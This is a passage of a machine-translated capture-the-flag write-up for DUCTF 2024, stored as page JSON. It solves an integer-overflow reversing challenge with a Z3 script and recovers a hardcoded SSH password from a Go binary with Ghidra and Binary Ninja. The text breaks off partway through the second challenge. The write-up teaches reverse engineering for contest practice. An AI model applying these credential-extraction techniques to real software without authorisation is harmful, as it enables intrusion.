{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-ductf-2024-en","result":{"data":{"markdownRemark":{"id":"6035b97d-fba5-56c3-b555-b2edf6606e84","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-ductf-2024\">original page</a>.</p>\n</blockquote>\n<p>This is a writeup for DUCTF.</p>\n<p>I’m very grateful that DUCTF publishes proper official writeups.</p>\n<p>Reference: <a href=\"https://github.com/DownUnderCTF/Challenges_2024_Public/tree/main\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">DownUnderCTF/Challenges<em>2024</em>Public: Files + Solutions for DownUnderCTF 2024 Challenges</a></p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#number-mashingrev\">number mashing(Rev)</a></li>\n<li>\n<p><a href=\"#sssshhhhrev\">sssshhhh(Rev)</a></p>\n<ul>\n<li><a href=\"#identifying-the-password-checking-code\">Identifying the password-checking code</a></li>\n<li><a href=\"#investigating-what-happens-after-login\">Investigating what happens after login</a></li>\n</ul>\n</li>\n<li><a href=\"#vector-overflowpwn\">vector overflow(Pwn)</a></li>\n<li><a href=\"#yawapwn\">yawa(Pwn)</a></li>\n<li><a href=\"#babys-first-forensicsforensic\">Baby’s First Forensics(Forensic)</a></li>\n<li><a href=\"#sam-i-amforensic\">SAM I AM(Forensic)</a></li>\n<li><a href=\"#bad-policiesforensic\">Bad Policies(Forensic)</a></li>\n<li><a href=\"#emuc2forensic\">emuc2(Forensic)</a></li>\n<li><a href=\"#macro-magicforensic\">Macro Magic(Forensic)</a></li>\n<li>\n<p><a href=\"#lost-in-memoryforensic\">Lost in Memory(Forensic)</a></p>\n<ul>\n<li><a href=\"#task-1\">Task 1</a></li>\n<li><a href=\"#task-2\">Task 2</a></li>\n<li><a href=\"#task-3\">Task 3</a></li>\n<li><a href=\"#task-4\">Task 4</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"number-mashingrev\" style=\"position:relative;\"><a href=\"#number-mashingrev\" aria-label=\"number mashingrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>number mashing(Rev)</h2>\n<blockquote>\n<p>Mash your keyboard numpad in a specific order and a flag might just pop out!</p>\n</blockquote>\n<p>When I decompiled the challenge binary, I found that it executes the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Give me some numbers: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token function\">__isoc99_scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d %d\"</span><span class=\"token punctuation\">,</span><span class=\"token operator\">&amp;</span>A<span class=\"token punctuation\">,</span><span class=\"token operator\">&amp;</span>B<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>A <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>B <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>B <span class=\"token operator\">==</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Nope!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\nx <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>B <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    x <span class=\"token operator\">=</span> A <span class=\"token operator\">/</span> B<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>x <span class=\"token operator\">!=</span> A<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Nope!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>It seems you can get the flag by supplying input where the result x of <code class=\"language-text\">x = A / B</code> becomes equal to A, using a non-zero <code class=\"language-text\">int</code> A and an <code class=\"language-text\">int</code> B that is neither 0 nor 1.</p>\n<p>I immediately realized that this probably involved taking advantage of integer overflow, but I couldn’t make such values by hand.</p>\n<p>After wasting a bunch of time, I finally realized I could just solve it with Z3, wrote the following solver, and got the flag in three minutes.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> z3 <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\nA <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string\">\"A\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nB <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string\">\"B\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\ns <span class=\"token operator\">=</span> Solver<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>A <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>B <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>B <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>A <span class=\"token operator\">==</span> <span class=\"token punctuation\">(</span>A<span class=\"token operator\">/</span>B<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ns<span class=\"token punctuation\">.</span>check<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>model<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># [B = 4294967295, A = 2147483648]</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 883px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b8ea71f39cbefd289203429991929855/fe9f1/image-20240706120230451.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 7.083333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAASUlEQVQI1x3GWw5AMBBAUUmZmc4GRJQ+UoT97+8SX+cMqSykOlOOlX41tlzZS+O8H2o/flMuiDmjGJNG9LuqEqNhZogK7k4IgRcHSxiwZb3/fwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b8ea71f39cbefd289203429991929855/8ac56/image-20240706120230451.webp 240w,\n/static/b8ea71f39cbefd289203429991929855/d3be9/image-20240706120230451.webp 480w,\n/static/b8ea71f39cbefd289203429991929855/d4bc4/image-20240706120230451.webp 883w\"\n              sizes=\"(max-width: 883px) 100vw, 883px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b8ea71f39cbefd289203429991929855/8ff5a/image-20240706120230451.png 240w,\n/static/b8ea71f39cbefd289203429991929855/e85cb/image-20240706120230451.png 480w,\n/static/b8ea71f39cbefd289203429991929855/fe9f1/image-20240706120230451.png 883w\"\n            sizes=\"(max-width: 883px) 100vw, 883px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b8ea71f39cbefd289203429991929855/fe9f1/image-20240706120230451.png\"\n            alt=\"image-20240706120230451\"\n            title=\"image-20240706120230451\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"sssshhhhrev\" style=\"position:relative;\"><a href=\"#sssshhhhrev\" aria-label=\"sssshhhhrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>sssshhhh(Rev)</h2>\n<blockquote>\n<p>Great news! We found the Kookaburras!… Bad news.. They’re locked up. We’ve managed to get access to the central terminal and ripped a binary off of it for you to analyse. Maybe you can find a way to free our friends?</p>\n</blockquote>\n<p>When I decompiled the challenge binary, it appeared to be a Go binary using a library called Wish.</p>\n<p>Wish is a library for creating applications that can be accessed remotely over SSH.</p>\n<p>Reference: <a href=\"https://github.com/charmbracelet/wish\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">charmbracelet/wish: Make SSH apps, just like that! 💫</a></p>\n<p>When I actually connected to the challenge binary, it asked for a password for SSH access.</p>\n<p>The password requested there seemed to be different from an actual Linux user’s password, so I assumed it was likely defined inside the program.</p>\n<p>So I decided to search the decompiled output for code that registers or verifies the password.</p>\n<h3 id=\"identifying-the-password-checking-code\" style=\"position:relative;\"><a href=\"#identifying-the-password-checking-code\" aria-label=\"identifying the password checking code permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Identifying the password-checking code</h3>\n<p>Eventually, after searching the Ghidra symbol tree for the string <code class=\"language-text\">password</code>, I found that a variable with the symbol name <code class=\"language-text\">password_spill</code> exists in the <code class=\"language-text\">RunSSH</code> code inside the <code class=\"language-text\">main</code> function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 468px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ffd322eb602eb6a3b179ef87537f8248/90372/image-20240709235202473.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 76.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACjklEQVQ4y42T207bQBCG/QqghviwPtuJEyd2EAnmkHOaEGwn4SBEERCo6EVv2gqpolz03f/O2oSmFRdcfJrxeHd2ZudfwXZKGHU8+NUyJFkFY4SqwdRdmG4J0d4+mq0WmrsRHNeFrLDsP2MvqDmyrKBaCyDYThmNwMbVyTaCoA6mGVAoqayq2eYtUUJRUiASCk9A/5mqk13HoLUq/HoIwdQZNjc2Efoypm0HVdeDrdMiSqTLDBqdrEhFyGIhQyp+IApr0DfFtwobqFQqEFoflwh7NwgHt9jvf0E0XGKQfkUy/45k8QPx/Bt2hneodi5R61694q/5dSLsL9HqLSBEk3sEvVsK3CDqPWBvcIf45BHnZ79wdvaEq4vfSOfPOEp+4jh9QjJ7xoT8KcF9Hh/Hj2gOH9DsziEM2i4ODk2USi61J0LZEuFpDhxmESZc1UJZsylmk7Ve8TJslMg6dKdiYROVKrVsu2XMjmoYdRuQKYFuGCgqSj4UlUFiOSL766++VzG+VqIBBo1tCJbtQiS5LKZVjHpNGn0DpmVlU+PTVun0t1jJ5VU2CpdNncvGJf0xqLqRJZ0MmqgFDZQrNG2XHyZT5VQJbVhHedHrynId+rkOXQryDRosS4cXmPC9EKOdMXphH916Hy0vwr5/iHatiwO/jU6tA8coZQe9Iexc/aqmZcKVCd6SQZetkWAN3YKumRmZr+f2/7Z5jqxCy3aoZRoCfx38gpWcvLV1+2/bq3Uc3ra0qrDsVWCYFizCzKxNrb9gvg/bcqgbjSqkoYynMYbHCfqLUwxOTtGdzdFOZ+i8G1p/HCO5uKYHcQlhGqcYUzC+WSK5vsXBfIHdJEWUEsk7oKTR0QTxp89IL+/xB+G1x68GjYyEAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ffd322eb602eb6a3b179ef87537f8248/8ac56/image-20240709235202473.webp 240w,\n/static/ffd322eb602eb6a3b179ef87537f8248/0799c/image-20240709235202473.webp 468w\"\n              sizes=\"(max-width: 468px) 100vw, 468px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ffd322eb602eb6a3b179ef87537f8248/8ff5a/image-20240709235202473.png 240w,\n/static/ffd322eb602eb6a3b179ef87537f8248/90372/image-20240709235202473.png 468w\"\n            sizes=\"(max-width: 468px) 100vw, 468px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ffd322eb602eb6a3b179ef87537f8248/90372/image-20240709235202473.png\"\n            alt=\"image-20240709235202473\"\n            title=\"image-20240709235202473\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The decompiled output of this function was as follows.</p>\n<p>The check <code class=\"language-text\">param_1 == 0x23</code> looked suspicious, as if it might be validating the password string.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined8 main<span class=\"token punctuation\">.</span>RunSSH<span class=\"token punctuation\">.</span><span class=\"token function\">func2</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  undefined8 uVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> unaff_R14<span class=\"token punctuation\">;</span>\n  github<span class=\"token punctuation\">.</span>com<span class=\"token operator\">/</span>charmbracelet<span class=\"token operator\">/</span>ssh<span class=\"token punctuation\">.</span>Context ctx_spill<span class=\"token punctuation\">;</span>\n  string password_spill<span class=\"token punctuation\">;</span>\n  \n  <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>stack0x00000000 <span class=\"token operator\">&lt;=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>undefined <span class=\"token operator\">*</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>unaff_R14 <span class=\"token operator\">+</span> <span class=\"token number\">0x10</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    runtime<span class=\"token punctuation\">.</span><span class=\"token function\">morestack_noctxt</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>param_1 <span class=\"token operator\">==</span> <span class=\"token number\">0x23</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    uVar1 <span class=\"token operator\">=</span> runtime<span class=\"token punctuation\">.</span><span class=\"token function\">memequal</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n    uVar1 <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> uVar1<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Although it is not shown in this decompilation result because Ghidra apparently could not analyze the binary properly, the disassembly shows that a hardcoded string is passed as an argument to the <code class=\"language-text\">memequal</code> function, as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 863px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/514682c7262cb9281442ad72c1e208fe/ee455/image-20240709235520768.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABtklEQVQoz1VS0ZKjIBD0My4CAoKgKBpNapO9//+vvobo1t5Dl1TS09PTM42QCq2QEFJCKQ2nPbwJMJ3FrRUo/18cbXv0foB1DsfrhWnJCOOImBJUpyuv6YeAuKxQPkJoAx8jOmPg4oglr/AhwjgP07sqWlCKHeuKeEFpVMSk6tCENGN7fUONC9rOYFk3OJLG7UBa75/OJBayPIvk6fjCJVYdOjqYKKLiDEGXYZygjYXnd5wXaDqrTsIIGyZYcqwPtZG8Gp1i1eEw0eHX++OQGYaJeWiNtO14vr/hOG4hXwJX4W9nv9GUvHq6FHQlhECcJo7sGbzHwN+lUvhza4lbfWtrKCbqYrqOwm37H5owbZjvX7Dp4EgZ28HtpTuG5cEoHowgY0wbxsLLD+TtiTTfMS4HOTv6mNGT05NT3k2cN+THG4YC3TAj5Z0bTBTZcex/kdkoMN+BKF8fEp0nCqxwXFzF/oRbdxg/fUa2DF2YHorrnzNvi6djrIPrB3RS1xHLyPWchqHebMwLJ+KbeUvLuOr4Ao3nvc37A8oNaBlyWUq5K8NNdiS2LP4JXZ4oyzmXUiHUz4L+AfruGUomPP3EAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/514682c7262cb9281442ad72c1e208fe/8ac56/image-20240709235520768.webp 240w,\n/static/514682c7262cb9281442ad72c1e208fe/d3be9/image-20240709235520768.webp 480w,\n/static/514682c7262cb9281442ad72c1e208fe/8e594/image-20240709235520768.webp 863w\"\n              sizes=\"(max-width: 863px) 100vw, 863px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/514682c7262cb9281442ad72c1e208fe/8ff5a/image-20240709235520768.png 240w,\n/static/514682c7262cb9281442ad72c1e208fe/e85cb/image-20240709235520768.png 480w,\n/static/514682c7262cb9281442ad72c1e208fe/ee455/image-20240709235520768.png 863w\"\n            sizes=\"(max-width: 863px) 100vw, 863px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/514682c7262cb9281442ad72c1e208fe/ee455/image-20240709235520768.png\"\n            alt=\"image-20240709235520768\"\n            title=\"image-20240709235520768\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>For this function, Binary Ninja produced a more accurate decompilation.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 935px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/eb390/image-20240710000737657.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 55.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABbElEQVQoz41Sy07CQBTt39DpvDozbQWKgI9oNDHQ0i4kEkUTExf+//J4Z4DKAouLkzOZm/s499zo+/0N2/UzFssKH+sNvjZbfL68olk1qOp6h6rCqll13BBaz22DmuKem7bFkuJR/fSI+aSEEAJKa+hUEyukBJsqGA9D/yaFoliSJL2Iyvs5bOEgOIe1Fi7LIJUC5wmk4NSIh2Y8gIMx1otoNC9hnEHCElhjQlFJyXEcgxHimO3e+4SzE84erlGUF5TMkBUF8uEINsvBpYLQaZhWKkkT865gX+FocjtFNsxpQobUkOS8IHa7gkqfLNi/w5spTG7JBE37czDWUCJJHQyC1APYkezj/y5+2OElmeL2poSCBO1yKJuRsya4HkBOe5e1b2wd7ZvUeNDbsxByN+H4akI7s1BSBDOCLL53lZqcgnc9gP9yJ3l8N4OhCRWdhJfrb/DcafSezbpZ4HY2pakSOmINIeW/lv8XfgAVF1m0vqlTiwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/8ac56/image-20240710000737657.webp 240w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/d3be9/image-20240710000737657.webp 480w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/c7dd1/image-20240710000737657.webp 935w\"\n              sizes=\"(max-width: 935px) 100vw, 935px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/8ff5a/image-20240710000737657.png 240w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/e85cb/image-20240710000737657.png 480w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/eb390/image-20240710000737657.png 935w\"\n            sizes=\"(max-width: 935px) 100vw, 935px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/eb390/image-20240710000737657.png\"\n            alt=\"image-20240710000737657\"\n            title=\"image-20240710000737657\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The <code class=\"language-text\">memequal</code> called here seems to compare whether the argument values match.</p>\n<p>I actually tried entering the hardcoded string <code class=\"language-text\">ManIReallyHateThoseDamnKookaburras!</code> as the password, and the check succeeded, confirming that this was indeed where the password was being verified.</p>\n<p>However, even though the password check passed, the text <code class=\"language-text\">No valid command</code> was displayed and the connection was closed, so I still couldn’t determine the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 719px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7eb14052f28922d81df640ab9167f485/073e9/image-20240710001206256.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 69.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnklEQVQ4y41T2W7CQAwM5L4PjgTCWQJpgf7/5009Dlu1UpDyYNmb2LMzttcKwxBxHCPNUliWpTabzRAEAXzf19i2bWRZprExk/u3RmMWsSAvcuR5hiRNUEhMANpytdTLyrLUc5IkWC4XGq/rNTKpqV/ecRxYcRwhikKkAkRQ+kwACMriXH0s50JBYokVWPLSNNWcoix+Y8t1XYRhoCCGPlnTe56n33mhbc/B3DG5NKrkf8vzPQXgIYoiZUjvuo4CVVUlrchf34bL2fMxUDU23wyAhSvpGSVVVYmF9Iqecowk9pS9ns/n44DKTPrIZCZ5nivgA2s/8JUN5VB+WQ2DCYTlW4YsIEMCmkJKpURHZPMS7c07gDHJBDG9Miy4KpTJCXLC74YxAugjFEbcMwPAnRr2clgjrs1kwO7a4Sp2Pp/Ub7YbBeTSEvDfK5hibbvFar1SoEv3gd1+h6ZpdMLtrhXbYi3/OaBJgHwubHzd1Hg87nh+P3A8HdD3N3TdRZnyabHPkwA/v3o8nnfcBOBw3IPnW3/VIdV1rU9tslyxH2LtNJ4Ou7EpAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7eb14052f28922d81df640ab9167f485/8ac56/image-20240710001206256.webp 240w,\n/static/7eb14052f28922d81df640ab9167f485/d3be9/image-20240710001206256.webp 480w,\n/static/7eb14052f28922d81df640ab9167f485/05ca6/image-20240710001206256.webp 719w\"\n              sizes=\"(max-width: 719px) 100vw, 719px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7eb14052f28922d81df640ab9167f485/8ff5a/image-20240710001206256.png 240w,\n/static/7eb14052f28922d81df640ab9167f485/e85cb/image-20240710001206256.png 480w,\n/static/7eb14052f28922d81df640ab9167f485/073e9/image-20240710001206256.png 719w\"\n            sizes=\"(max-width: 719px) 100vw, 719px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7eb14052f28922d81df640ab9167f485/073e9/image-20240710001206256.png\"\n            alt=\"image-20240710001206256\"\n            title=\"image-20240710001206256\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From here, it looked like I needed to identify some way this program returns the flag.</p>\n<h3 id=\"investigating-what-happens-after-login\" style=\"position:relative;\"><a href=\"#investigating-what-happens-after-login\" aria-label=\"investigating what happens after login permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 